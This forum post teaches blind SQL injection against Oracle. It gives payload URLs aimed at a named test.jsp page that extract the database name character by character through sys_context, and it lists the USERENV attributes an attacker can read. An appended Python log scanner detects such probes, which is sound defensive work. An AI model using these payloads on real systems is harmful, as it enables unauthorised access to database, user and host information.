mrbear posted on 2018-9-25 06:33:49

Oracle injection: using sys_context

  In Oracle, sys_context can be used to retrieve basic information. Notes follow:
  http://www.nuanyue.com/test.jsp=1' and ascii(substr(length((sys_context('userenv','db_name'))),0,1))=89
  Checks whether the ASCII value of the character count of db_name is 89
  http://www.nuanyue.com/test.jsp=1' and ascii(substr((sys_context('userenv','db_name')),1,1))=109
  http://www.nuanyue.com/test.jsp=1' and ascii(substr((sys_context('userenv','db_name')),2,1))>0
  // Gets the ASCII value of the first character; the rest follow the same pattern. Below is the information that can be retrieved.
select
  SYS_CONTEXT('USERENV','TERMINAL') terminal,
  SYS_CONTEXT('USERENV','LANGUAGE') language,
  SYS_CONTEXT('USERENV','SESSIONID') sessionid,
  SYS_CONTEXT('USERENV','INSTANCE') instance,
  SYS_CONTEXT('USERENV','ENTRYID') entryid,
  SYS_CONTEXT('USERENV','ISDBA') isdba,
  SYS_CONTEXT('USERENV','NLS_TERRITORY') nls_territory,
  SYS_CONTEXT('USERENV','NLS_CURRENCY') nls_currency,
  SYS_CONTEXT('USERENV','NLS_CALENDAR') nls_calendar,
  SYS_CONTEXT('USERENV','NLS_DATE_FORMAT') nls_date_format,
  SYS_CONTEXT('USERENV','NLS_DATE_LANGUAGE') nls_date_language,
  SYS_CONTEXT('USERENV','NLS_SORT') nls_sort,
  SYS_CONTEXT('USERENV','CURRENT_USER') current_user,
  SYS_CONTEXT('USERENV','CURRENT_USERID') current_userid,
  SYS_CONTEXT('USERENV','SESSION_USER') session_user,
  SYS_CONTEXT('USERENV','SESSION_USERID') session_userid,
  SYS_CONTEXT('USERENV','PROXY_USER') proxy_user,
  SYS_CONTEXT('USERENV','PROXY_USERID') proxy_userid,
  SYS_CONTEXT('USERENV','DB_DOMAIN') db_domain,
  SYS_CONTEXT('USERENV','DB_NAME') db_name,
  SYS_CONTEXT('USERENV','HOST') host,
  SYS_CONTEXT('USERENV','OS_USER') os_user,
  SYS_CONTEXT('USERENV','EXTERNAL_NAME') external_name,
  SYS_CONTEXT('USERENV','IP_ADDRESS') ip_address,
  SYS_CONTEXT('USERENV','NETWORK_PROTOCOL') network_protocol,
  SYS_CONTEXT('USERENV','BG_JOB_ID') bg_job_id,
  SYS_CONTEXT('USERENV','FG_JOB_ID') fg_job_id,
  SYS_CONTEXT('USERENV','AUTHENTICATION_TYPE') authentication_type,
  SYS_CONTEXT('USERENV','AUTHENTICATION_DATA') authentication_data
from dual
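
For defenders, the request pattern in the post is easy to spot in web logs. The following is an added example, not part of the original post: it flags request targets that call sys_context('userenv', ...) and groups them per client. The log format ("client request-target"), the function names, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Fold the typographic quotes seen in the post (and in pasted payloads) to ASCII.
QUOTES = str.maketrans({"‘": "'", "’": "'", "′": "'"})
SYS_CTX = re.compile(r"sys_context\s*\(\s*'?\s*userenv\s*'?\s*,\s*'?\s*(\w+)", re.I)
BLIND = re.compile(r"ascii\s*\(\s*substr\s*\(", re.I)


def normalize(target: str) -> str:
    """URL-decode until stable (at most 3 rounds), then fold quote variants."""
    for _ in range(3):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target.translate(QUOTES)


def inspect(target: str) -> dict:
    """Report the USERENV attributes named in one request target."""
    text = normalize(target)
    attrs = sorted({m.group(1).upper() for m in SYS_CTX.finditer(text)})
    return {"attributes": attrs, "blind": bool(attrs) and bool(BLIND.search(text))}


def summarize(log_lines):
    """Group flagged requests by client: attributes probed and probe count."""
    report = defaultdict(lambda: {"attributes": set(), "probes": 0})
    for line in log_lines:
        client, _, target = line.partition(" ")
        hit = inspect(target)
        if hit["attributes"]:
            report[client]["attributes"].update(hit["attributes"])
            report[client]["probes"] += 1
    return {c: {"attributes": sorted(r["attributes"]), "probes": r["probes"]}
            for c, r in report.items()}


# Constructed log lines ("client request-target"); addresses are documentation ranges.
SAMPLE_LOG = [
    "192.0.2.10 /test.jsp?id=1' and ascii(substr((sys_context('userenv','db_name')),1,1))=109",
    "192.0.2.10 /test.jsp?id=1%27%20and%20ascii(substr((SYS_CONTEXT(%27USERENV%27,%27ISDBA%27)),1,1))%3E0",
    "192.0.2.10 /test.jsp?id=1′ and ascii(substr((sys_context(‘userenv’,'db_name’)),2,1))>0",
    "198.51.100.7 /search.jsp?q=oracle+sys_context+documentation",
    "198.51.100.7 /test.jsp?id=42",
]
```

A hit here indicates probing, not a fix; the underlying remedy is to pass the request parameter to Oracle as a bind variable instead of concatenating it into the SQL text.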